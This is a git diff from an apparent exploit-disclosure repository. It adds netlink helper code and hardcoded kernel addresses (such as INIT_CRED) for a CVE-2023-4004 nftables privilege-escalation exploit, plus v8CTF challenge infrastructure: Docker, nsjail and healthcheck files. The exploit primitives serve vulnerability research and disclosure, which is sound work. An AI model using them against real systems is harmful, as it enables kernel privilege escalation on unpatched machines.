+void elem_flush(struct nl_sock * socket, char *table_name, char *set_name){
+ struct nl_msg * msg = nlmsg_alloc();
+ //batch: NFNL_MSG_BATCH_BEGIN / NFT_MSG_DELSETELEM / NFNL_MSG_BATCH_END
+ struct nlmsghdr *hdr1 = nlmsg_put(
+ msg,
+ NL_AUTO_PORT, // auto assign current pid
+ NL_AUTO_SEQ, // begin with seq number 0
+ NFNL_MSG_BATCH_BEGIN, // TYPE
+ sizeof(struct nfgenmsg),
+ NLM_F_REQUEST //NLM_F_ECHO
+ );
+ struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg));
+ h->nfgen_family = 2;
+ h->version = 0;
+ h->res_id = NFNL_SUBSYS_NFTABLES;
+ memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg));
+
+ struct nl_msg * msg2 = nlmsg_alloc();
+ struct nlmsghdr *hdr2 = nlmsg_put(
+ msg2,
+ NL_AUTO_PORT, // auto assign current pid
+ NL_AUTO_SEQ, // begin with seq number 0
+ (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELSETELEM),// TYPE
+ sizeof(struct nfgenmsg),
+ NLM_F_REQUEST //NLM_F_ECHO
+ );
+ struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg));
+ h2->nfgen_family = 2;//NFPROTO_IPV4;
+ h2->version = 0;
+ h2->res_id = NFNL_SUBSYS_NFTABLES;
+ memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg));
+ struct nl_msg * msg3 = nlmsg_alloc();
+ struct nlmsghdr *hdr3 = nlmsg_put(
+ msg3,
+ NL_AUTO_PORT, // auto assign current pid
+ NL_AUTO_SEQ, // begin with seq number 0
+ NFNL_MSG_BATCH_END,// TYPE
+ sizeof(struct nfgenmsg),
+ NLM_F_REQUEST //NLM_F_ECHO
+ );
+ //init msg
+ //no NFTA_SET_ELEM_LIST_ELEMENTS attribute: deletes (flushes) every element of the set
+ nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, table_name);
+ nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, set_name);
+
+ uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len);
+ char *buf = malloc(total_size);
+ memset(buf,0,total_size);
+ memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len));
+ memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len));
+ memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len));
+ int res = nl_sendto(socket, buf, total_size);
+ nlmsg_free(msg);
+ if (res < 0) {
+ fprintf(stderr, "sending message failed\n");
+ } else {
+ //printf("Flush set\n");
+ }
+}
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/spec.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/spec.h
new file mode 100644
index 00000000..036abf51
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/spec.h
@@ -0,0 +1,2 @@
+#define INIT_CRED 0xFFFFFFFF836618C0
+#define MODULE_CT_EXPECT_OBJ_TYPE_ADDR 0xFFFFFFFF8393A2C0
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/table.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/table.h
new file mode 100644
index 00000000..a623f956
--- /dev/null
+++
b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/table.h
@@ -0,0 +1,197 @@
+void new_table(struct nl_sock * socket, char *name){
+ struct nl_msg * msg = nlmsg_alloc();
+ //batch: NFNL_MSG_BATCH_BEGIN / NFT_MSG_NEWTABLE / NFNL_MSG_BATCH_END
+ struct nlmsghdr *hdr1 = nlmsg_put(
+ msg,
+ NL_AUTO_PORT, // auto assign current pid
+ NL_AUTO_SEQ, // begin with seq number 0
+ NFNL_MSG_BATCH_BEGIN, // TYPE
+ sizeof(struct nfgenmsg),
+ NLM_F_REQUEST //NLM_F_ECHO
+ );
+ struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg));
+ h->nfgen_family = 2;//NFPROTO_IPV4;
+ h->version = 0;
+ h->res_id = NFNL_SUBSYS_NFTABLES;
+ memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg));
+
+ struct nl_msg * msg2 = nlmsg_alloc();
+ struct nlmsghdr *hdr2 = nlmsg_put(
+ msg2,
+ NL_AUTO_PORT, // auto assign current pid
+ NL_AUTO_SEQ, // begin with seq number 0
+ (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWTABLE),// TYPE
+ sizeof(struct nfgenmsg),
+ NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO
+ );
+ struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg));
+ h2->nfgen_family = 2;//NFPROTO_IPV4;
+ h2->version = 0;
+ h2->res_id = NFNL_SUBSYS_NFTABLES;
+ memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg));
+ struct nl_msg * msg3 = nlmsg_alloc();
+ struct nlmsghdr *hdr3 = nlmsg_put(
+ msg3,
+ NL_AUTO_PORT, // auto assign current pid
+ NL_AUTO_SEQ, // begin with seq number 0
+ NFNL_MSG_BATCH_END,// TYPE
+ sizeof(struct nfgenmsg),
+ NLM_F_REQUEST //NLM_F_ECHO
+ );
+ nla_put_string(msg2, NFTA_TABLE_NAME, name);
+ uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len);
+ char *buf = malloc(total_size);
+ memset(buf,0,total_size);
+ memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len));
+ memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len));
+ memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len));
+ int res = nl_sendto(socket, buf, total_size);
+ nlmsg_free(msg);
+ if (res < 0) {
+ fprintf(stderr, "sending message failed\n");
+ } else {
+ //printf("Create table\n");
+ }
+}
+
+void new_table_with_udata(struct nl_sock * socket, char *name,char *udata, int len){
+ struct nl_msg * msg = nlmsg_alloc();
+ //batch: NFNL_MSG_BATCH_BEGIN / NFT_MSG_NEWTABLE / NFNL_MSG_BATCH_END
+ struct nlmsghdr *hdr1 = nlmsg_put(
+ msg,
+ NL_AUTO_PORT, // auto assign current pid
+ NL_AUTO_SEQ, // begin with seq number 0
+ NFNL_MSG_BATCH_BEGIN, // TYPE
+ sizeof(struct nfgenmsg),
+ NLM_F_REQUEST //NLM_F_ECHO
+ );
+ struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg));
+ h->nfgen_family = 2;//NFPROTO_IPV4;
+ h->version = 0;
+ h->res_id = NFNL_SUBSYS_NFTABLES;
+ memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg));
+
+ struct nl_msg * msg2 = nlmsg_alloc();
+ struct nlmsghdr *hdr2 = nlmsg_put(
+ msg2,
+ NL_AUTO_PORT, // auto assign current pid
+ NL_AUTO_SEQ, // begin with seq number 0
+ (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWTABLE),// TYPE
+ sizeof(struct nfgenmsg),
+ NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO
+ );
+ struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg));
+ h2->nfgen_family = 2;//NFPROTO_IPV4;
+ h2->version = 0;
+ h2->res_id = NFNL_SUBSYS_NFTABLES;
+ memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg));
+ struct nl_msg * msg3 = nlmsg_alloc();
+ struct nlmsghdr *hdr3 = nlmsg_put(
+ msg3,
+ NL_AUTO_PORT, // auto assign current pid
+ NL_AUTO_SEQ, // begin with seq number 0
+ NFNL_MSG_BATCH_END,// TYPE
+ sizeof(struct nfgenmsg),
+ NLM_F_REQUEST //NLM_F_ECHO
+ );
+ nla_put_string(msg2, NFTA_TABLE_NAME, name);
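+ // attach a caller-controlled user data blob (len bytes) to the table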
+ nla_put(msg2,NFTA_TABLE_USERDATA,len,udata);
+ uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len);
+ char *buf = malloc(total_size);
+ memset(buf,0,total_size);
+ memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len));
+ memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len));
+ memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len));
+ int res = nl_sendto(socket, buf, total_size);
+ nlmsg_free(msg);
+ if (res < 0) {
+ fprintf(stderr, "sending message failed\n");
+ } else {
+ //printf("Create table\n");
+ }
+}
+
+void get_table(struct nl_sock * socket, char *name){
+ //init msg
+ struct nl_msg * msg = nlmsg_alloc();
+ //single (non-batched) NFT_MSG_GETTABLE request
+ nfnlmsg_put(
+ msg,
+ NL_AUTO_PID, // auto assign current pid
+ NL_AUTO_SEQ, // begin with seq number 0
+ NFNL_SUBSYS_NFTABLES, //SUBSYS
+ NFT_MSG_GETTABLE, // TYPE
+ NLM_F_REQUEST, //NLM_F_ECHO
+ 2, //FAMILY
+ 0 //RES_ID
+ );
+ //init msg
+ nla_put_string(msg, NFTA_TABLE_NAME, name);
+
+ int res = nl_send_auto(socket, msg);
+ nlmsg_free(msg);
+ if (res < 0) {
+ fprintf(stderr, "sending message failed\n");
+ } else {
+ //printf("Get table %s\n",name);
+ }
+}
+void del_table(struct nl_sock * socket, char *table_name){
+
+ struct nl_msg * msg = nlmsg_alloc();
+ struct nlmsghdr *hdr1 = nlmsg_put(
+ msg,
+ NL_AUTO_PORT, // auto assign current pid
+ NL_AUTO_SEQ, // begin with seq number 0
+ NFNL_MSG_BATCH_BEGIN, // TYPE
+ sizeof(struct nfgenmsg),
+ NLM_F_REQUEST //NLM_F_ECHO
+ );
+ struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg));
+ h->nfgen_family = 2;
+ h->version = 0;
+ h->res_id = NFNL_SUBSYS_NFTABLES;
+ memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg));
+
+ struct nl_msg * msg2 = nlmsg_alloc();
+ struct nlmsghdr *hdr2 = nlmsg_put(
+ msg2,
+ NL_AUTO_PORT, // auto assign current pid
+ NL_AUTO_SEQ, // begin with seq number 0
+ (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELTABLE),// TYPE
+ sizeof(struct nfgenmsg),
+ NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO
+ );
+ struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg));
+ h2->nfgen_family = 2;//NFPROTO_IPV4;
+ h2->version = 0;
+ h2->res_id = NFNL_SUBSYS_NFTABLES;
+ memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg));
+ struct nl_msg * msg3 = nlmsg_alloc();
+ struct nlmsghdr *hdr3 = nlmsg_put(
+ msg3,
+ NL_AUTO_PORT, // auto assign current pid
+ NL_AUTO_SEQ, // begin with seq number 0
+ NFNL_MSG_BATCH_END,// TYPE
+ sizeof(struct nfgenmsg),
+ NLM_F_REQUEST //NLM_F_ECHO
+ );
+ //init msg
+
+ nla_put_string(msg2, NFTA_TABLE_NAME, table_name);
+
+ uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len);
+ char *buf = malloc(total_size);
+ memset(buf,0,total_size);
+ memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len));
+ memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len));
+ memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len));
+ int res = nl_sendto(socket, buf, total_size);
+ nlmsg_free(msg);
+ if (res < 0) {
+ fprintf(stderr, "sending message failed\n");
+ } else {
+ //printf("Delete table %s\n",table_name);
+ }
+
+}
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/metadata.json
new file mode 100644
index 00000000..dcbf5b6c
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/metadata.json
@@ -0,0 +1,51 @@
+{
"$schema":"https://google.github.io/security-research/kernelctf/metadata.schema.v2.json", + "submission_ids":[ + "exp73" + ], + "vulnerability":{ + "patch_commit":"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=87b5a5c209405cb6b57424cdfa226a6dbd349232", + "cve":"CVE-2023-4004", + "affected_versions":[ + "5.6-rc1 - 6.5" + ], + "requirements":{ + "attack_surface":[ + + ], + "capabilities":[ + "CAP_NET_ADMIN" + ], + "kernel_config":[ + "CONFIG_NETFILTER", + "CONFIG_NF_TABLES" + ] + } + }, + "exploits":[ + { + "environment":"lts-6.1.36", + "uses":[ + "userns" + ], + "requires_seperate_kaslr_leak":false, + "stability_notes":"3 ~ 4 times success per 10 times run" + }, + { + "environment":"cos-105-17412.101.17", + "uses":[ + "userns" + ], + "requires_seperate_kaslr_leak":false, + "stability_notes":"3 ~ 4 times success per 10 times run" + }, + { + "environment":"mitigation-6.1", + "uses":[ + "userns" + ], + "requires_seperate_kaslr_leak":false, + "stability_notes":"3 ~ 4 times success per 10 times run" + } + ] + } diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/original.tar.gz new file mode 100644 index 00000000..b941340f Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/original.tar.gz differ diff --git a/pocs/linux/kvmctf/README.md b/pocs/linux/kvmctf/README.md new file mode 100644 index 00000000..15db30cd --- /dev/null +++ b/pocs/linux/kvmctf/README.md @@ -0,0 +1 @@ +Add your kvmCTF exploit PRs to this folder as per the kvmCTF [rules of submission](https://google.github.io/security-research/kvmctf/rules.md) diff --git a/v8ctf/README.md b/v8ctf/README.md new file mode 100644 index 00000000..7917e03c --- /dev/null +++ b/v8ctf/README.md @@ -0,0 +1,13 @@ +# v8CTF challenge + +This challenge is part of the v8CTF, an exploit VRP for the v8 JavaScript engine. + +See RULES.md for how to participate. + +You can reach it at `nc v8.ctfcompetition.com 1337`. + +It runs a `chrome --headless=new` on a user-provided URL. You can find the command line in chrome/challenge/chal and the Chrome version in chrome/challenge/Dockerfile. + +The flag is at /flag/flag and is in the format `v8CTF{.*}`. + +If you want to recreate the environment locally, check out https://google.github.io/kctf/ for tips on how to use the kCTF infrastructure. diff --git a/v8ctf/chrome/README.md b/v8ctf/chrome/README.md new file mode 100644 index 00000000..44415f63 --- /dev/null +++ b/v8ctf/chrome/README.md @@ -0,0 +1,55 @@ +# Quickstart guide to writing a challenge + +The basic steps when preparing a challenge are: + +* A Docker image is built from the `challenge` directory. For the simplest challenges, replacing `challenge/chal.c` is sufficient. +* Edit `challenge/Dockerfile` to change the commandline or the files you want to include. +* To try the challenge locally, you will need to + * create a a local cluster with `kctf cluster create --type kind --start $configname` + * build the challenge binary with `make -C challenge` + * and then deploy the challenge with `kctf chal start` +* To access the challenge, create a port forward with `kctf chal debug port-forward` and connect to it via `nc localhost PORT` using the printed port. +* Check out `kctf chal ` for more commands. + +## Directory layout + +The following files/directories are available: + +### /challenge.yaml + +`challenge.yaml` is the main configuration file. 
You can use it to change +settings like the name and namespace of the challenge, the exposed ports, the +proof-of-work difficulty etc. +For documentation on the available fields, you can run `kubectl explain challenge` and +`kubectl explain challenge.spec`. + +### /challenge + +The `challenge` directory contains a Dockerfile that describes the challenge and +any challenge files. This template comes with a Makefile to build the challenge, +which is the recommended way for pwnables if the deployed binary matters, e.g. +if you hand it out as an attachment for ROP gadgets. +If the binary layout doesn't matter, you can build it using an intermediate +container as part of the Dockerfile similar to how the chroot is created. + +### /healthcheck + +The `healthcheck` directory is optional. If you don't want to write a healthcheck, feel free to delete it. However, we strongly recommend that you implement a healthcheck :). + +We provide a basic healthcheck skeleton that uses pwntools to implement the +healthcheck code. The only requirement is that the healthcheck replies to GET +requests to http://$host:45281/healthz with either a success or an error status +code. + +In most cases, you will only have to modify `healthcheck/healthcheck.py`. + +## API contract + +Ensure your setup fulfills the following requirements to ensure it works with kCTF: + +* Verify `kctf_setup` is used as the first command in the CMD instruction of your `challenge/Dockerfile`. +* You can do pretty much whatever you want in the `challenge` directory but: +* We strongly recommend using nsjail in all challenges. While nsjail is already installed, you need to configure it in `challenge/nsjail.cfg`. For more information on nsjail, see the [official website](https://nsjail.dev/). +* Your challenge receives connections on port 1337. The port can be changed in `challenge.yaml`. +* The healthcheck directory is optional. + * If it exists, the image should run a webserver on port 45281 and respond to `/healthz` requests. diff --git a/v8ctf/chrome/challenge.yaml b/v8ctf/chrome/challenge.yaml new file mode 100644 index 00000000..558ba3ad --- /dev/null +++ b/v8ctf/chrome/challenge.yaml @@ -0,0 +1,27 @@ +apiVersion: kctf.dev/v1 +kind: Challenge +metadata: + name: chrome +spec: + deployed: true + powDifficultySeconds: 1 + network: + public: true + healthcheck: + # TIP: disable the healthcheck during development + enabled: true + podTemplate: + template: + spec: + containers: + - name: challenge + volumeMounts: + - name: flag + mountPath: /chroot/flag + readOnly: true + volumes: + - name: flag + secret: + defaultMode: 0555 + secretName: v8ctf-flag + optional: true diff --git a/v8ctf/chrome/challenge/Dockerfile b/v8ctf/chrome/challenge/Dockerfile new file mode 100644 index 00000000..18b09afe --- /dev/null +++ b/v8ctf/chrome/challenge/Dockerfile @@ -0,0 +1,56 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
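+# Stage 1 ("chroot"): install Chrome into a plain Ubuntu tree; the kctf base
+# image below copies the whole tree to /chroot and runs it under nsjail.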
+FROM ubuntu:22.04 as chroot + +RUN /usr/sbin/useradd --no-create-home -u 1000 user + +RUN apt-get update && apt-get install -y gnupg2 wget + +# Install latest chrome dev package and fonts to support major charsets (Chinese, Japanese, Arabic, Hebrew, Thai and a few others) +# Note: this installs the necessary libs to make the bundled version of Chromium that Puppeteer installs, work. +# Deps from https://github.com/puppeteer/puppeteer/blob/main/docs/troubleshooting.md#chrome-headless-doesnt-launch-on-unix +# plus libxshmfence1 which seems to be missing +RUN wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - \ + && sh -c 'echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list' \ + && apt-get update \ + && DEBIAN_FRONTEND=noninteractive apt-get install -yq --no-install-recommends \ + google-chrome-stable \ + && rm -rf /var/lib/apt/lists/* + +RUN apt-get update && apt-get install -y unzip + +RUN mkdir /home/user +# This version is to be released on 2023-11-06 +RUN wget 'https://edgedl.me.gvt1.com/edgedl/chrome/chrome-for-testing/118.0.5993.70/linux64/chrome-linux64.zip' -O /home/user/chrome-linux.zip +RUN cd /home/user && unzip chrome-linux.zip && rm chrome-linux.zip + +COPY chal /home/user/ + +FROM gcr.io/kctf-docker/challenge@sha256:0f7d757bcda470c3bbc063606335b915e03795d72ba1d8fdb6f0f9ff3757364f + +COPY --from=chroot / /chroot +RUN mkdir /chroot/dev/shm +RUN touch /chroot/dev/null +RUN touch /chroot/dev/zero +RUN touch /chroot/dev/urandom + +RUN mkdir /chroot/run/dbus + +COPY nsjail.cfg /home/user/ + +CMD kctf_setup && \ + kctf_drop_privs \ + socat \ + TCP-LISTEN:1337,reuseaddr,fork \ + EXEC:"kctf_pow nsjail --config /home/user/nsjail.cfg -- /home/user/chal",stderr diff --git a/v8ctf/chrome/challenge/chal b/v8ctf/chrome/challenge/chal new file mode 100755 index 00000000..a2c7f981 --- /dev/null +++ b/v8ctf/chrome/challenge/chal @@ -0,0 +1,15 @@ +#!/usr/bin/bash + +CHROME=/home/user/chrome-linux64/chrome + +echo "Version: $($CHROME --version | head -n1)" +echo "Please send me a URL to open." +read -r url +if ! echo $url | grep -E '^https?://[A-Za-z0-9.:/?%\-_+&=]*$' -q; then + echo 'url regex fail' + exit 1 +fi + +export HOME=/tmp +dbus-daemon --system +dbus-run-session -- $CHROME --headless=new --no-sandbox --disable-crashpad --disable-breakpad --disable-crash-reporter --user-data-dir=/tmp/chrome-userdata --enable-logging=stderr "${url}" diff --git a/v8ctf/chrome/challenge/nsjail.cfg b/v8ctf/chrome/challenge/nsjail.cfg new file mode 100644 index 00000000..b2d96e8f --- /dev/null +++ b/v8ctf/chrome/challenge/nsjail.cfg @@ -0,0 +1,64 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# See options available at https://github.com/google/nsjail/blob/master/config.proto + +name: "default-nsjail-configuration" +description: "Default nsjail configuration for pwnable-style CTF task." 
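+# Headless Chrome needs real /dev and /proc entries, writable tmpfs mounts for
+# /tmp and /run/dbus, and network access (clone_newnet: false) - see the mounts below.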
+ +mode: ONCE +uidmap {inside_id: "1000"} +gidmap {inside_id: "1000"} +disable_rl: true +clone_newnet: false + +cwd: "/home/user" + +mount: [ + { + src: "/chroot" + dst: "/" + is_bind: true + }, + { + src: "/dev" + dst: "/dev" + is_bind: true + }, + { + dst: "/tmp" + fstype: "tmpfs" + rw: true + }, + { + dst: "/run/dbus" + fstype: "tmpfs" + rw: true + }, + { + dst: "/run/user" + fstype: "tmpfs" + rw: true + }, + { + dst: "/proc" + fstype: "proc" + rw: true + }, + { + src: "/etc/resolv.conf" + dst: "/etc/resolv.conf" + is_bind: true + } +] diff --git a/v8ctf/chrome/healthcheck/Dockerfile b/v8ctf/chrome/healthcheck/Dockerfile new file mode 100644 index 00000000..2df56306 --- /dev/null +++ b/v8ctf/chrome/healthcheck/Dockerfile @@ -0,0 +1,18 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +FROM gcr.io/kctf-docker/healthcheck@sha256:6709709a8cfd6e2d743c86d58398c00ca4eb26befd3b1a0a629ab35f91e98ef0 + +COPY healthcheck_loop.sh healthcheck.py healthz_webserver.py /home/user/ + +CMD kctf_drop_privs /home/user/healthcheck_loop.sh & /home/user/healthz_webserver.py diff --git a/v8ctf/chrome/healthcheck/README.md b/v8ctf/chrome/healthcheck/README.md new file mode 100644 index 00000000..8dbcd6a8 --- /dev/null +++ b/v8ctf/chrome/healthcheck/README.md @@ -0,0 +1,14 @@ +# Healthcheck + +kCTF checks the health of challenges by accessing the healthcheck via +http://host:45281/healthz which needs to return either 200 ok or an error +depending on the status of the challenge. + +The default healthcheck consists of: +* a loop that repeatedly calls a python script and writes the status to a file +* a webserver that checks the file and serves /healthz +* the actual healthcheck code using pwntools for convenience + +To modify it, you will likely only have to change the script in healthcheck.py. +You can test if the challenge replies as expected or better add a full example +solution that will try to get the flag from the challenge. diff --git a/v8ctf/chrome/healthcheck/healthcheck.py b/v8ctf/chrome/healthcheck/healthcheck.py new file mode 100755 index 00000000..0a25bd22 --- /dev/null +++ b/v8ctf/chrome/healthcheck/healthcheck.py @@ -0,0 +1,44 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
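+
+# The check below behaves like a player: it solves the kctf proof-of-work if
+# enabled, sends the challenge a URL pointing at a local listener, and verifies
+# that the headless browser actually requests it.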
+ +import socket +from pwn import * + +def handle_pow(r): + print(r.recvuntil(b'python3 ')) + print(r.recvuntil(b' solve ')) + challenge = r.recvline().decode('ascii').strip() + p = process(['kctf_bypass_pow', challenge]) + solution = p.readall().strip() + r.sendline(solution) + print(r.recvuntil(b'Correct\n')) + +r = remote('127.0.0.1', 1337) +print(r.recvuntil('== proof-of-work: ')) +if r.recvline().startswith(b'enabled'): + handle_pow(r) + +l = listen() + +r.readuntil(b'URL to open.', timeout=10) +r.sendline(bytes('http://localhost:{}/ok'.format(l.lport), 'ascii')) + +_ = l.wait_for_connection() + +l.readuntil(b'GET /ok HTTP/1.1') +l.send(b'HTTP/1.1 200 OK\nContent-Length: 0\n\n') + +exit(0) diff --git a/v8ctf/chrome/healthcheck/healthcheck_loop.sh b/v8ctf/chrome/healthcheck/healthcheck_loop.sh new file mode 100755 index 00000000..acf69158 --- /dev/null +++ b/v8ctf/chrome/healthcheck/healthcheck_loop.sh @@ -0,0 +1,32 @@ +#!/bin/bash +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +set -Eeuo pipefail + +TIMEOUT=20 +PERIOD=30 + +export TERM=linux +export TERMINFO=/etc/terminfo + +while true; do + echo -n "[$(date)] " + if timeout "${TIMEOUT}" /home/user/healthcheck.py; then + echo 'ok' | tee /tmp/healthz + else + echo -n "$? " + echo 'err' | tee /tmp/healthz + fi + sleep "${PERIOD}" +done diff --git a/v8ctf/chrome/healthcheck/healthz_webserver.py b/v8ctf/chrome/healthcheck/healthz_webserver.py new file mode 100755 index 00000000..62cf0198 --- /dev/null +++ b/v8ctf/chrome/healthcheck/healthz_webserver.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
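+
+# Tiny status webserver: GET /healthz returns 200 if /tmp/healthz (written by
+# healthcheck_loop.sh) contains "ok" and 400 otherwise; any other path is a 404.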
+import http.server + +class HealthzHandler(http.server.BaseHTTPRequestHandler): + def do_GET(self): + if self.path != '/healthz': + self.send_response(404) + self.send_header("Content-length", "0") + self.end_headers() + return + + content = b'err' + try: + with open('/tmp/healthz', 'rb') as fd: + content = fd.read().strip() + except: + pass + self.send_response(200 if content == b'ok' else 400) + self.send_header("Content-type", "text/plain") + self.send_header("Content-length", str(len(content))) + self.end_headers() + self.wfile.write(content) + +httpd = http.server.HTTPServer(('', 45281), HealthzHandler) +httpd.serve_forever() diff --git a/v8ctf/kctf/VERSION b/v8ctf/kctf/VERSION new file mode 100644 index 00000000..f8a696c8 --- /dev/null +++ b/v8ctf/kctf/VERSION @@ -0,0 +1 @@ +1.7.2 diff --git a/v8ctf/kctf/activate b/v8ctf/kctf/activate new file mode 100644 index 00000000..6f189c80 --- /dev/null +++ b/v8ctf/kctf/activate @@ -0,0 +1,309 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +if 